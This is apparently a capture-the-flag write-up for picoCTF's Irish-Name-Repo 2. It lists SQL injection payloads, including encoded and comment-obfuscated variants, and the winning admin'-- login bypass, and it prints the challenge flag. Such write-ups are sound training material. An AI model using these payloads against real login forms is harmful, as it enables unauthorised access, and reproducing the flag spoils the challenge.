Coming from this challenge's prequel Irish-Name-Repo 1 - picoCTF '19, I was hellbent thinking I had to encode the password parameter. I tried several SQL injection variations, including:
' oR 1=1 --
- case manipulation
%27%20%20%6f%72%20%31%3d%31%20%2d%2d
- URL encoding
'/**/ or /**/ 1=1 /**/ --
- Comment obfuscation
00%' or 1=1 --
- null hex encoding
...and other combinations but to no avail. Once I shifted my attention, the solution became straightforward.
STEPS TO SOLUTION
use admin'--
in the username parameter.
Breakdown:
-
admin
- value for username query. -
'
- closes the input string. -
--
- comments out the remaining query.
FLAG: picoCTF{m0R3_SQL_plz_fa983901}
PWNSOME REFERENCES
https://portswigger.net/support/sql-injection-bypassing-common-filters
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
Top comments (0)